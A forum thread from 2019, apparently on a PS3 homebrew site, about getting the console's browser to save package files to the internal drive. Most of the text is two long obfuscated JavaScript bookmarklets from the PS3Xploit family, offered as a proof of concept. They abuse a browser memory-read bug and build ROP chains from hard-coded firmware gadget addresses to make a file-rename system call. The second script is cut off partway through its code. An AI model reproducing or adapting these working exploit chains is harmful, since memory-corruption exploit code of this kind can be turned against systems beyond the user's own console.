PS3 Redirecting browser downloads to /dev_hdd0

lmn7 · Mar 27, 2019

Okay quick POC of something I mentioned in an earlier post:

1. Use method described by NewFile to background download pkg as png, save it as download.png
2. Make sure dev_hdd0/packages directory is on the hard drive
3. Run the script below, it will rename the download.png to download.pkg in dev_hdd0/packages
4. Install pkg from package manager

Code:

javascript:eval('var xtra_data,stack_frame,jump_2,jump_1,xtra_data_addr,stack_frame_addr,jump_2_addr,jump_1_addr,debug=!1,ps3xploit_ecdsa_key="948DA13E8CAFD5BA0E90CE434461BB327FE7E080475EAA0AD3AD4F5B6247A7FDA86DF69790196773",index_key="DA7D4B5E499A4F53B1C1A14A7484443B",start_x="xxxx",offset_array=[],t_out=0,ps3xploit_ecdsa_key_addr=0,index_key_addr=0,search_max_threshold=73400320,search_base=2148532224,search_size=2*mbytes,search_base_off=0,search_size_ext=0,gtemp_addr=2365587456,total_loops=0,max_loops=20,frame_fails=0,sp_exit=2413354176,ffs=4294967295,dbyte41=16705,dbyte00=0,byte_size=1,hword_size=2,word_size=4,dword_size=8,mbytes=1048576,stat_size_offset=40,toc_addr=7296336,default_vsh_pub_toc=7263652,vsh_opd_patch=617820,vsh_opd_addr=7256936,vsh_ps3xploit_key_toc=7370612,toc_entry1_addr=7185360,toc_entry2_addr=7494200,toc_entry3_addr=7185352,toc_entry4_addr=7602176,toc_entry5_addr=7255744,toc_entry6_addr=0,gadget1_addr=620036,gadget2_addr=6332484,gadget3_addr=872540,gadget4_addr=2267192,gadget5_addr=1227548,gadget6_addr=6380604,gadget7_addr=131024,gadget8_addr=131072,gadget_mod1_addr=6352696,gadget_mod2_addr=80756,gadget_mod3_addr=757248,gadget_mod4a_addr=890500,gadget_mod7_addr=108204,gadget_mod8_addr=2862264,hr="\74hr\76",gadget12_addr=0x0C864C,sc_sm_shutdown=0x17B,soft_reboot=0x200,ua=navigator.userAgent,fwv=ua.substring(ua.indexOf("5.0 (")+19,ua.indexOf(") Apple")),utc=new Date().toJSON().slice(0,10).replace(/-/g,\47/\47);document.write(\47\74html\76\74head\76\74title\76PS3Xploit - PKG Renamer\74/title\76\74/head\76\74body id="bodyId" style="background-color:#FFFFFF"\76\74div id="headerId"\76\74h1\76Renaming PNG file to PKG...\74/h1\76\74span id="hideme" style="visibility:hidden"\76\74p\76\74button id="btnROP" type="button" onclick="initROP(true);" autofocus\76Initialize\74/button\76 | Close \74input type="checkbox" id="auto_close" name="aclose" checked="checked" onclick="autoclose();"/\76\74span id="dex_txt" style="visibility:hidden"\76\74input type="checkbox" id="dex" name="DEX" disabled="" onclick="dex();"/\76\74/span\76\74/p\76\74p\76\74button id="btnTrigger" disabled="" type="button" onclick="triggerX();"\76En\74/button\76\74span id="reset" style="visibility:hidden"\76 | \74button id="btnReset" type="button" onclick="disable_trigger();"\76Reset\74/button\76\74/span\76\74/p\76\74/span\76\74div id="exploit" \76\74/div\76\74div id="trigger"\76\74/div\76\74/body\76\74/html\76\47);if(fwv=="4.84"){var toc_addr=7296344,default_vsh_pub_toc=7263660,vsh_opd_patch=617820,vsh_opd_addr=7256944,vsh_toc_addr_screenshot=7472764,vsh_ps3xploit_key_toc=7370860,toc_entry1_addr=7185360,toc_entry2_addr=7494456,toc_entry3_addr=7185352,toc_entry4_addr=7602176,toc_entry5_addr=7255752,toc_entry6_addr=0,gadget1_addr=620036,gadget2_addr=6332644,gadget3_addr=872540,gadget4_addr=2267192,gadget5_addr=1227548,gadget6_addr=6380764,gadget7_addr=131024,gadget8_addr=131072,gadget9_addr=170760,gadget10_addr=6479908,gadget11_addr=5874864,gadget12_addr=820812,gadget13_addr=4777384,gadget14_addr=4769696,gadget15_addr=4758664,gadget_mod1_addr=6352856,gadget_mod2_addr=80756,gadget_mod3_addr=757248,gadget_mod4a_addr=890500,gadget_mod4b_addr=4376440,gadget_mod4c_addr=346864,gadget_mod5_addr=4339932,gadget_mod6_addr=134144,gadget_mod7_addr=108204,gadget_mod8_addr=2862264,gadget_mod9_addr=68384,gadget_mod10_addr=1857428,gadget_mod11_addr=1618244,gadget_mod12_addr=6500860,gadget_mod13_addr=3369072,gadget_mod14_addr=6502656,gadget_mod15_addr=3788856,gadget_mod16_addr=5206828}function hexh2bin(a){return String.fromCharCode(a)}function hexw2bin(a){return String.fromCharCode(a\76\7616)+String.fromCharCode(a)}function hexdw2bin(a){return hexw2bin(0)+hexw2bin(a)}String.prototype.toHex16=function(){return(\470000\47+this).substr(-4)};String.prototype.toAscii=function(a){var b=\47\47;var i=0;while(i\74this.length){if(a===true){b+=this.charCodeAt(i).toString(16).toHex16()}else{b+=this.charCodeAt(i).toString(16)}i+=1}return b};String.prototype.convert=function(a){if(this.length\741){return\47\47}var b=\47\47;var c=\47\47;var i=0;var d=[];if(a===true){b=this}else{b=this.toAscii()}while((b.length%4)!==0){b+=\4700\47}if(b.substr(b.length-3,2)!==\4700\47){b+=\470000\47}while(i\74b.length){c=b.substr(i,4);d.push(String.fromCharCode(parseInt(c,16)));i+=4}return d.join(\47\47)};String.prototype.convertedSize=function(a){if(this.length\741){return 0}var b=\47\47;if(a===true){b=this}else{b=this.toAscii()}while((b.length%4)!==0){b+=\4700\47}if(b.substr(b.length-3,2)!==\4700\47){b+=\470000\47}return b.length/2};String.prototype.replaceAt=function(a,b){return this.substr(0,a)+b+this.substr(a+b.length)};String.prototype.repeat=function(a){return new Array(a+1).join(this)};Number.prototype.noExponents=function(){var a=String(this).split(/[eE]/);if(a.length===1){return a[0]}var z=\47\47,sign=this\740?\47-\47:\47\47,str=a[0].replace(\47.\47,\47\47),mag=Number(a[1])+1;if(mag\740){z=sign+\470.\47;while(mag++){z+=\470\47}return z+str.replace(/^\-/,\47\47)}mag-=str.length;while(mag--){z+=\470\47}return str+z};function fromIEEE754(a,b,c){var d=0;var g=[];var i;var j;var h;for(i=a.length;i;i-=1){h=a[i-1];for(j=8;j;j-=1){g.push(h%2?1:0);h=h\76\761}}g.reverse();var k=g.join(\47\47);var l=(1\74\74(b-1))-1;var s=parseInt(k.substring(0,1),2)?-1:1;var e=parseInt(k.substring(1,1+b),2);var f=parseInt(k.substring(1+b),2);if(e===(1\74\74b)-1){d=f!==0?NaN:s*Infinity}else if(e\760){d=s*Math.pow(2,e-l)*(1+f/Math.pow(2,c))}else if(f!==0){d=s*Math.pow(2,-(l-1))*(f/Math.pow(2,c))}else{d=s*0}return d.noExponents()}function generateIEEE754(a,b){var c=new Array((a\76\7624)&0xFF,(a\76\7616)&0xFF,(a\76\768)&0xFF,(a)&0xFF,(b\76\7624)&0xFF,(b\76\7616)&0xFF,(b\76\768)&0xFF,(b)&0xFF);return fromIEEE754(c,11,52)}function generateExploit(a,b){var n=(a\74\7432)|((b\76\761)-1);return generateIEEE754(a,(n-a))}function readMemory(a,b){if(document.getElementById(\47exploit\47)){document.getElementById(\47exploit\47).style.src="local("+generateExploit(a,b)+")"}}function checkMemory(a,b,c){if(document.getElementById(\47exploit\47)){readMemory(a,b);if(debug===true){var x=document.getElementById(\47exploit\47).style.src.substr(6,c);return x}return document.getElementById(\47exploit\47).style.src.substr(6,c)}}function trigger(a){if(document.getElementById(\47trigger\47)){document.getElementById("trigger").innerHTML=-parseFloat("NAN(ffffe"+a.toString(16)+")")}}function rop_exit(a){var b=document.getElementById(\47auto_close\47);if(b){if(b.checked===true)window.close()}}function load_check(){if(total_loops\74max_loops){t_out=setTimeout(initROP,1000,false)}else{total_loops=0;t_out=0}}function findJsVariableOffset(a,b,c,d){readMemory(c,d);var e=document.getElementById(\47exploit\47).style.src.substr(6,d);var i=0;var t;var k;var f;var g;while(i\74(e.length*2)){if(e.charCodeAt(i/2)===b.charCodeAt(0)){f=0;for(k=0;k\74(b.length*2);k+=0x2){if(e.charCodeAt((i+k)/2)!==b.charCodeAt(k/2)){break}f+=1}if(f===b.length){g=c+i+4;for(t=0;t\74offset_array.length;t+=1){if(offset_array[t]===g){return-1}}offset_array.push(g);return g}}i+=0x10}var h=c+d;return 0}function memcpy(a,b,c){return callsub(gadget8_addr,a,b,c,0,0,0,0,0,0,0x70)}function store_word(a,b,c,d,e){if(c===null){c=gtemp_addr}if(d===null){d=gtemp_addr}if(e===null){e=gtemp_addr}return hexdw2bin(gadget_mod3_addr)+fill_by_16bytes(0x60,dbyte41)+hexdw2bin(b)+fill_by_8bytes(0x8,dbyte41)+hexdw2bin(a-0xC74)+fill_by_16bytes(0x10,dbyte41)+hexdw2bin(gadget_mod7_addr)+fill_by_16bytes(0x70,dbyte41)+hexdw2bin(c)+hexdw2bin(d)+hexdw2bin(e)+hexdw2bin(sp_exit)+fill_by_8bytes(0x8,dbyte41)}function stack_frame_hookup(){return unescape("\u4141\u2A2F")+hexw2bin(gadget1_addr)+hexw2bin(toc_addr)+fill_by_16bytes(0x20,dbyte41)+hexdw2bin(toc_addr)+fill_by_16bytes(0x70,dbyte41)}function stack_frame_exit(){return hexdw2bin(gadget_mod8_addr)+unescape("\u2F2A")}function syscall(a,b,c,d,e,f,g,h,i,j){if(j===null){j=gtemp_addr}return hexdw2bin(gadget_mod2_addr)+fill_by_16bytes(0x60,dbyte41)+hexdw2bin(gtemp_addr)+fill_by_16bytes(0x10,dbyte41)+hexdw2bin(gadget_mod1_addr)+fill_by_16bytes(0x50,dbyte41)+fill_by_4bytes(0xC,dbyte41)+hexw2bin(a)+hexw2bin(i)+hexw2bin(g)+hexw2bin(f)+hexw2bin(e)+hexw2bin(d)+hexw2bin(c)+fill_by_4bytes(0x4,dbyte41)+hexw2bin(h)+fill_by_16bytes(0x20,dbyte41)+hexdw2bin(b)+fill_by_16bytes(0x10,dbyte41)+hexdw2bin(gadget_mod2_addr)+fill_by_16bytes(0x60,dbyte41)+hexdw2bin(gtemp_addr)+fill_by_16bytes(0x10,dbyte41)+hexdw2bin(gadget_mod4a_addr)+fill_by_16bytes(0x60,dbyte41)+hexdw2bin(j)+hexdw2bin(sp_exit)+fill_by_8bytes(0x8,dbyte41)}function callsub(a,b,c,d,e,f,g,h,i,j,k,l,m){var n=0x20;if(m===null){m=gtemp_addr}if(l===null){l=gtemp_addr}return hexdw2bin(gadget_mod2_addr)+fill_by_16bytes(0x60,dbyte41)+hexdw2bin(gtemp_addr)+fill_by_16bytes(0x10,dbyte41)+hexdw2bin(gadget_mod1_addr)+fill_by_16bytes(0x50,dbyte41)+fill_by_4bytes(0xC,dbyte41)+hexw2bin(j)+hexw2bin(i)+hexw2bin(g)+hexw2bin(f)+hexw2bin(e)+hexw2bin(d)+hexw2bin(c)+fill_by_4bytes(0x4,dbyte41)+hexw2bin(h)+fill_by_16bytes(0x20,dbyte41)+hexdw2bin(b)+fill_by_16bytes(0x10,dbyte41)+hexdw2bin(gadget_mod2_addr)+fill_by_16bytes(0x60,dbyte41)+hexdw2bin(l)+fill_by_16bytes(0x10,dbyte41)+hexdw2bin(a)+fill_by_16bytes(k-n,dbyte00)+hexdw2bin(m)+hexdw2bin(sp_exit)+fill_by_8bytes(0x8,dbyte41)}function fill_by_4bytes(a,b){var c=\47\47;var d=0;var e=hexh2bin(b);while(d\74a/4){c+=e.repeat(2);d++}return c}function fill_by_8bytes(a,b){var c=\47\47;var d=0;var e=hexh2bin(b);while(d\74a/8){c+=e.repeat(4);d++}return c}function fill_by_16bytes(a,b){var c=\47\47;var d=0;var e=hexh2bin(b);while(d\74a/16){c+=e.repeat(8);d++}return c}function initDefaults(){offset_array=[];xtra_data_addr=0;stack_frame_addr=0;jump_2_addr=0;jump_1_addr=0;ps3xploit_ecdsa_key_addr=0;index_key_addr=0;search_max_threshold=70*0x100000;search_base=0x80100000;search_size=2*mbytes;search_size_ext=0*mbytes;search_base_off=0*mbytes;total_loops++}function initROP(a){try{if(a===true){frame_fails=0;search_base_off=0;search_size_ext=0}if(t_out!==0){clearTimeout(t_out);t_out=0}initDefaults();var b="/dev_hdd0/photo/"+utc+"/download.png";var c="/dev_hdd0/packages/download.pkg";xtra_data=start_x.convert()+b.convert()+c.convert()+unescape("\uFD7E");while(xtra_data_addr===0){if(search_max_threshold\74search_size){load_check();return}xtra_data=xtra_data.replaceAt(0,hexh2bin(0x7EFD));xtra_data_addr=findJsVariableOffset("xtra_data",xtra_data,search_base,search_size);search_max_threshold-=search_size}var d=xtra_data_addr+0x2;var f=d+b.convertedSize();stack_frame=stack_frame_hookup()+syscall(0x0000032C,d,f,0,0,0,0,0,0)+stack_frame_exit();while(stack_frame_addr===0){if(search_max_threshold\74search_size+search_size_ext){frame_fails++;if((frame_fails%10)===0){search_base_off+=0;search_size_ext+=0}load_check();return}stack_frame=stack_frame.replaceAt(0,hexh2bin(0x2A2F));stack_frame_addr=findJsVariableOffset("stack_frame",stack_frame,search_base+search_base_off,search_size+search_size_ext);if(stack_frame_addr==-1)if(search_max_threshold\74search_size+search_size_ext){frame_fails++;load_check();return}search_max_threshold-=search_size+search_size_ext}jump_2=unescape("\u0102\u7EFB")+fill_by_16bytes(0x30,0x8282)+hexw2bin(stack_frame_addr)+unescape("\uFB7E");while(jump_2_addr===0){if(search_max_threshold\74search_size){load_check();return}jump_2=jump_2.replaceAt(0,hexh2bin(0x7EFB));jump_2_addr=findJsVariableOffset("jump_2",jump_2,search_base,search_size);if(jump_2_addr==-1)if(search_max_threshold\74search_size){load_check();return}search_max_threshold-=search_size}jump_1=unescape("\u4141\u7EFA")+hexw2bin(jump_2_addr)+unescape("\uFA7E");while(jump_1_addr===0){if(search_max_threshold\74search_size){load_check();return}jump_1=jump_1.replaceAt(0,hexh2bin(0x7EFA));jump_1_addr=findJsVariableOffset("jump_1",jump_1,search_base,search_size);if(jump_1_addr==-1)if(search_max_threshold\74search_size){load_check();return}search_max_threshold-=search_size}var g=checkMemory(stack_frame_addr-0x4,0x8000,stack_frame.length);var x=checkMemory(xtra_data_addr-0x4,0x1000,xtra_data.length);var h=checkMemory(jump_2_addr-0x4,0x1000,jump_2.length);var i=checkMemory(jump_1_addr-0x4,0x1000,jump_1.length);if((h===jump_2)&&(i===jump_1)&&(x===xtra_data)&&(g===stack_frame)){if(t_out!==0){clearTimeout(t_out)}triggerX()}else{load_check()}}catch(e){}}function triggerX(){setTimeout(trigger,1000,jump_1_addr);setTimeout(rop_exit,2000,hr);setTimeout(window.close,2000);t_out=0;total_loops=0}initROP(true);');

P.S you can change file names if you want, just leave everything else as is.

Kazama · Apr 4, 2019

Cant you plz add this feature to han tool box please, I mean like the offline HAN enabler. Can we Download to internal HDD ? Is it possible.

DeViL303 · Apr 4, 2019

Kazama said:
Cant you plz add this feature to han tool box please, I mean like the offline HAN enabler. Can we Download to internal HDD ? Is it possible.

If the package is served as a png then yes it is possible.

Kazama · Apr 4, 2019

DeViL303 said:
If the package is served as a png then yes it is possible.

I have renamed .pkg to .PNG and downloaded to my ps3 HDD , but what's next ? How to rename it back to pkg from the internal HDD ? There is no packages folder exist in my hdd0 folder (ps3 4.84 hfw)

lmn7 · Apr 5, 2019

Kazama said:
I have renamed .pkg to .PNG and downloaded to my ps3 HDD , but what's next ? How to rename it back to pkg from the internal HDD ? There is no packages folder exist in my hdd0 folder (ps3 4.84 hfw)

My post was just a POC to show it works, I am working on something more refined atm.

DeViL303 · Apr 5, 2019

lmn7 said:
@DeViL303 I tested the Python scripts once again, got it working so we can install the pdb files without an empty icon appearing on XMB, then the user can reboot and the downloads will show up in network column just like a PSN download. They may even show up without reboot, not sure..

Cool, So you mean you perfected the "force install to" package method, so no blank space, that is great.

So guess we need an exploit to copy to, or create a "package" folder in dev_hdd0/. I suppose a "force install to" could install the packages folder

There is a method here, its just how to do it in cleanest way possible. Lots of possibilities.

lmn7 · Apr 5, 2019

DeViL303 said:
Cool, So you mean you perfected the "force install to" package method, so no blank space, that is great.

So guess we need an exploit to copy to, or create a "package" folder in dev_hdd0/. I suppose a "force install to" could install the packages folder

There is a method here, its just how to do it in cleanest way possible. Lots of possibilities.

Yep, it seems like the most "complete" and convenient method, since we can use our own icons, titles, and we can also queue multiple downloads at once. It's also more reliable than an exploit that renames files, which has a chance to fail.

Yes the packages folder can either be created with an exploit using sys_fs_mkdir, or with the PKG file itself. I don't think this is how it works though, using the bubble method the pkgs are stored somewhere in /dev_hd00/tmp/np or something like that while downloading, then they're transferred to somewhere in /dev_hdd0/vsh/task when it's finished downloading.

We will need some sample pdb files to do some more testing, if anyone could start a download from PSN, pause it, then grab the pdb files from /dev_hdd0/vsh/task and upload them here, I'd be extremely grateful. If not, I can just grab them myself when I can.

DeViL303 · Apr 5, 2019

lmn7 said:
Yep, it seems like the most "complete" and convenient method, since we can use our own icons, titles, and we can also queue multiple downloads at once. It's also more reliable than an exploit that renames files, which has a chance to fail.

Yes the packages folder can either be created with an exploit using sys_fs_mkdir, or with the PKG file itself. I don't think this is how it works though, using the bubble method the pkgs are stored somewhere in /dev_hd00/tmp/np or something like that while downloading, then they're transferred to somewhere in /dev_hdd0/vsh/task when it's finished downloading.

We will need some sample pdb files to do some more testing, if anyone could start a download from PSN, pause it, then grab the pdb files from /dev_hdd0/vsh/task and upload them here, I'd be extremely grateful. If not, I can just grab them myself when I can.

Well yes, true. I was mixing up methods there. we dont actually need any dev_hdd0/package folder when using bubbles. They download to dev_hdd0/tmp/np_pkg/ as far as i know. Not actually 100% sure. I know they go there when not being downloaded in the background anyway.

I can try get some bubbles going, my main testing console is banned though, so if someone else can grab some examples and upload that would be easier.

also see esc0rtd3w project involving bubbles, he probably has most of the work done already.

lmn7 · Apr 5, 2019

DeViL303 said:
Well yes, true. I was mixing up methods there. we dont actually need any dev_hdd0/package folder when using bubbles. They download to dev_hdd0/tmp/np_pkg/ as far as i know. Not actually 100% sure. I know they go there when not being downloaded in the background anyway.

I can try get some bubbles going, my main testing console is banned though, so if someone else can grab some examples and upload that would be easier.

also see esc0rtd3w project involving bubbles, he probably has most of the work done already.

I just tested some pdb files posted in that psxhax thread with esc0rtd3w. The pkg installation works fine, requires reboot to get the download to show up. The download never actually works though, it keeps alternating between downloading and pending state.

Could be an issue with the way I replaced the download link, not sure. Server logs show the file is not being accessed, the URL is correct so I don't know what the issue could be. If anyone knows more about this than I do, maybe @esc0rtd3w, please share your knowledge.

DeViL303 · Apr 5, 2019

Well i think the issue will be that place holder i talked about. Normally when a download starts, the PS3 creates a placeholder file the exact size of pkg, this is then filled in by the download, but it has full size from the start so we cant inject the file, we need to create it, either with exploit, or by triggering normal OFW process of creating it,

lmn7 · Apr 5, 2019

DeViL303 said:
Well i think the issue will be that place holder i talked about. Normally when a download starts, the PS3 creates a placeholder file the exact size of pkg, this is then filled in by the download, but it has full size from the start so we cant inject the file, we need to create it, either with exploit, or by triggering normal OFW process of creating it,

I completely forgot about that, do you know the location and contents of the placeholder file? Is it all just null bytes?

DeViL303 · Apr 5, 2019

lmn7 said:
I completely forgot about that, do you know the location and contents of the placeholder file? Is it all just null bytes?

I think it must be all zeroes. Im not actually sure. Would need to dump one.

lmn7 · Apr 5, 2019

DeViL303 said:
I think it must be all zeroes. Im not actually sure. Would need to dump one.

I can get it somewhat working, but we cannot just put our own pdb files on the PS3 like I thought. There is some other file that must be keeping track of all downloads, because if you don't start a download from PSN and use that as a base, the download will pend forever. Looks like this method is more complicated than I first thought.

Kazama · Apr 5, 2019

All the best guys. I hope u guys will find the solution to redirect downloads to internal HDD.u guys rock.

lmn7 · Apr 5, 2019

Well the bubble stuff is a dead end, it doesn't work properly at all. I came up with another idea to manage downloads though, I'm working on fixing some small bugs but it does work well for me so far.

Code:

javascript:eval('var xtra_data,stack_frame,jump_2,jump_1,xtra_data_addr,stack_frame_addr,jump_2_addr,jump_1_addr,start_x="xxxx",offset_array=[],t_out=0,search_max_threshold=73400320,search_base=2148532224,search_size=2*mbytes,search_base_off=0,search_size_ext=0,gtemp_addr=2365587456,total_loops=0,max_loops=20,frame_fails=0,sp_exit=2413354176,ffs=4294967295,dbyte41=16705,dbyte00=0,byte_size=1,hword_size=2,word_size=4,dword_size=8,mbytes=1048576,stat_size_offset=40,toc_addr=7296336,gadget1_addr=620036,gadget_mod1_addr=6352696,gadget_mod2_addr=80756,gadget_mod3_addr=757248,gadget_mod4a_addr=890500,gadget_mod7_addr=108204,gadget_mod8_addr=2862264,hr="\74hr\76",ua=navigator.userAgent,fwv=ua.substring(ua.indexOf("5.0 (")+19,ua.indexOf(") Apple")),utc=new Date().toJSON().slice(0,10).replace(/-/g,\47/\47);document.write(\47\74html\76\74head\76\74title\76PS3Xploit - PKG Downloader\74/title\76\74/head\76\74body id="bodyId" style="background-color:#FFFFFF"\76\74h1\76PS3Xploit - PKG Downloader\74/h1\76\74b\76\74hr\76\74br\76Server IP (including port): \74input type="text" id="srvip" name="srvip" maxlength="20" size="20" oninput="srv()"\76\74br\76\74br\76Press triangle \74a href="" id="surl"\76here\74/a\76\74br\76Select File -&gt; Save Target -&gt; System Storage (Photo)\74br\76Click the button below once the download has completed\74/b\76\74br\76\74br\76\74input id="init" type="button" value="Rename file" onclick="initROP(true)"\76\74div id="exploit"\76\74/div\76\74div id="trigger"\76\74/div\76\74/body\76\74/html\76\47);if(fwv=="4.84"){var toc_addr=7296344,gadget1_addr=620036,gadget9_addr=170760,gadget10_addr=6479908,gadget11_addr=5874864,gadget13_addr=4777384,gadget14_addr=4769696,gadget15_addr=4758664,gadget_mod1_addr=6352856,gadget_mod2_addr=80756,gadget_mod3_addr=757248,gadget_mod4a_addr=890500,gadget_mod4b_addr=4376440,gadget_mod4c_addr=346864,gadget_mod5_addr=4339932,gadget_mod6_addr=134144,gadget_mod7_addr=108204,gadget_mod8_addr=2862264,gadget_mod9_addr=68384,gadget_mod10_addr=1857428,gadget_mod11_addr=1618244,gadget_mod12_addr=6500860,gadget_mod13_addr=3369072,gadget_mod14_addr=6502656,gadget_mod15_addr=3788856,gadget_mod16_addr=5206828}function srv(){document.getElementById("surl").href="http://"+document.getElementById("srvip").value+"/package.png"}function hexh2bin(a){return String.fromCharCode(a)}function hexw2bin(a){return String.fromCharCode(a\76\7616)+String.fromCharCode(a)}function hexdw2bin(a){return hexw2bin(0)+hexw2bin(a)}String.prototype.toHex16=function(){return(\470000\47+this).substr(-4)};String.prototype.toAscii=function(a){var b=\47\47;var i=0;while(i\74this.length){if(a===true){b+=this.charCodeAt(i).toString(16).toHex16()}else{b+=this.charCodeAt(i).toString(16)}i+=1}return b};String.prototype.convert=function(a){if(this.length\741){return\47\47}var b=\47\47;var c=\47\47;var i=0;var d=[];if(a===true){b=this}else{b=this.toAscii()}while((b.length%4)!==0){b+=\4700\47}if(b.substr(b.length-3,2)!==\4700\47){b+=\470000\47}while(i\74b.length){c=b.substr(i,4);d.push(String.fromCharCode(parseInt(c,16)));i+=4}return d.join(\47\47)};String.prototype.convertedSize=function(a){if(this.length\741){return 0}var b=\47\47;if(a===true){b=this}else{b=this.toAscii()}while((b.length%4)!==0){b+=\4700\47}if(b.substr(b.length-3,2)!==\4700\47){b+=\470000\47}return b.length/2};String.prototype.replaceAt=function(a,b){return this.substr(0,a)+b+this.substr(a+b.length)};String.prototype.repeat=function(a){return new Array(a+1).join(this)};Number.prototype.noExponents=function(){var a=String(this).split(/[eE]/);if(a.length===1){return a[0]}var z=\47\47,sign=this\740?\47-\47:\47\47,str=a[0].replace(\47.\47,\47\47),mag=Number(a[1])+1;if(mag\740){z=sign+\470.\47;while(mag++){z+=\470\47}return z+str.replace(/^\-/,\47\47)}mag-=str.length;while(mag--){z+=\470\47}return str+z};function fromIEEE754(a,b,c){var d=0;var g=[];var i;var j;var h;for(i=a.length;i;i-=1){h=a[i-1];for(j=8;j;j-=1){g.push(h%2?1:0);h=h\76\761}}g.reverse();var k=g.join(\47\47);var l=(1\74\74(b-1))-1;var s=parseInt(k.substring(0,1),2)?-1:1;var e=parseInt(k.substring(1,1+b),2);var f=parseInt(k.substring(1+b),2);if(e===(1\74\74b)-1){d=f!==0?NaN:s*Infinity}else if(e\760){d=s*Math.pow(2,e-l)*(1+f/Math.pow(2,c))}else if(f!==0){d=s*Math.pow(2,-(l-1))*(f/Math.pow(2,c))}else{d=s*0}return d.noExponents()}function generateIEEE754(a,b){var c=new Array((a\76\7624)&0xFF,(a\76\7616)&0xFF,(a\76\768)&0xFF,(a)&0xFF,(b\76\7624)&0xFF,(b\76\7616)&0xFF,(b\76\768)&0xFF,(b)&0xFF);return fromIEEE754(c,11,52)}function generateExploit(a,b){var n=(a\74\7432)|((b\76\761)-1);return generateIEEE754(a,(n-a))}function readMemory(a,b){if(document.getElementById(\47exploit\47)){document.getElementById(\47exploit\47).style.src="local("+generateExploit(a,b)+")"}}function checkMemory(a,b,c){if(document.getElementById(\47exploit\47)){readMemory(a,b);return document.getElementById(\47exploit\47).style.src.substr(6,c)}}function trigger(a){if(document.getElementById(\47trigger\47)){document.getElementById("trigger").innerHTML=-parseFloat("NAN(ffffe"+a.toString(16)+")")}}function rop_exit(a){alert("You can now install your PKG file!")}function load_check(){if(total_loops\74max_loops){t_out=setTimeout(initROP,1000,false)}else{total_loops=0;t_out=0}}function findJsVariableOffset(a,b,c,d){readMemory(c,d);var e=document.getElementById(\47exploit\47).style.src.substr(6,d);var i=0;var t;var k;var f;var g;while(i\74(e.length*2)){if(e.charCodeAt(i/2)===b.charCodeAt(0)){f=0;for(k=0;k\74(b.length*2);k+=0x2){if(e.charCodeAt((i+k)/2)!==b.charCodeAt(k/2)){break}f+=1}if(f===b.length){g=c+i+4;for(t=0;t\74offset_array.length;t+=1){if(offset_array[t]===g){return-1}}offset_array.push(g);return g}}i+=0x10}var h=c+d;return 0}function stack_frame_hookup(){return unescape("\u4141\u2A2F")+hexw2bin(gadget1_addr)+hexw2bin(toc_addr)+fill_by_16bytes(0x20,dbyte41)+hexdw2bin(toc_addr)+fill_by_16bytes(0x70,dbyte41)}function stack_frame_exit(){return hexdw2bin(gadget_mod8_addr)+unescape("\u2F2A")}function syscall(a,b,c,d,e,f,g,h,i,j){if(j===null){j=gtemp_addr}return hexdw2bin(gadget_mod2_addr)+fill_by_16bytes(0x60,dbyte41)+hexdw2bin(gtemp_addr)+fill_by_16bytes(0x10,dbyte41)+hexdw2bin(gadget_mod1_addr)+fill_by_16bytes(0x50,dbyte41)+fill_by_4bytes(0xC,dbyte41)+hexw2bin(a)+hexw2bin(i)+hexw2bin(g)+hexw2bin(f)+hexw2bin(e)+hexw2bin(d)+hexw2bin(c)+fill_by_4bytes(0x4,dbyte41)+hexw2bin(h)+fill_by_16bytes(0x20,dbyte41)+hexdw2bin(b)+fill_by_16bytes(0x10,dbyte41)+hexdw2bin(gadget_mod2_addr)+fill_by_16bytes(0x60,dbyte41)+hexdw2bin(gtemp_addr)+fill_by_16bytes(0x10,dbyte41)+hexdw2bin(gadget_mod4a_addr)+fill_by_16bytes(0x60,dbyte41)+hexdw2bin(j)+hexdw2bin(sp_exit)+fill_by_8bytes(0x8,dbyte41)}function callsub(a,b,c,d,e,f,g,h,i,j,k,l,m){var n=0x20;if(m===null){m=gtemp_addr}if(l===null){l=gtemp_addr}return hexdw2bin(gadget_mod2_addr)+fill_by_16bytes(0x60,dbyte41)+hexdw2bin(gtemp_addr)+fill_by_16bytes(0x10,dbyte41)+hexdw2bin(gadget_mod1_addr)+fill_by_16bytes(0x50,dbyte41)+fill_by_4bytes(0xC,dbyte41)+hexw2bin(j)+hexw2bin(i)+hexw2bin(g)+hexw2bin(f)+hexw2bin(e)+hexw2bin(d)+hexw2bin(c)+fill_by_4bytes(0x4,dbyte41)+hexw2bin(h)+fill_by_16bytes(0x20,dbyte41)+hexdw2bin(b)+fill_by_16bytes(0x10,dbyte41)+hexdw2bin(gadget_mod2_addr)+fill_by_16bytes(0x60,dbyte41)+hexdw2bin(l)+fill_by_16bytes(0x10,dbyte41)+hexdw2bin(a)+fill_by_16bytes(k-n,dbyte00)+hexdw2bin(m)+hexdw2bin(sp_exit)+fill_by_8bytes(0x8,dbyte41)}function fill_by_4bytes(a,b){var c=\47\47;var d=0;var e=hexh2bin(b);while(d\74a/4){c+=e.repeat(2);d++}return c}function fill_by_8bytes(a,b){var c=\47\47;var d=0;var e=hexh2bin(b);while(d\74a/8){c+=e.repeat(4);d++}return c}function fill_by_16bytes(a,b){var c=\47\47;var d=0;var e=hexh2bin(b);while(d\74a/16){c+=e.repeat(8);d++}return c}function initDefaults(){offset_array=[];xtra_data_addr=0;stack_frame_addr=0;jump_2_addr=0;jump_1_addr=0;search_max_threshold=70*0x100000;search_base=0x80100000;search_size=2*mbytes;search_size_ext=0*mbytes;search_base_off=0*mbytes;total_loops++}function initROP(a){try{if(a===true){frame_fails=0;search_base_off=0;search_size_ext=0}if(t_out!==0){clearTimeout(t_out);t_out=0}initDefaults();document.getElementById("init").disabled=true;var b="/dev_hdd0/photo/"+utc+"/package.png";var c="/dev_hdd0/packages/download.pkg";xtra_data=start_x.convert()+b.convert()+c.convert()+unescape("\uFD7E");while(xtra_data_addr===0){if(search_max_threshold\74search_size){load_check();return}xtra_data=xtra_data.replaceAt(0,hexh2bin(0x7EFD));xtra_data_addr=findJsVariableOffset("xtra_data",xtra_data,search_base,search_size);search_max_threshold-=search_size}var d=xtra_data_addr+0x2;var 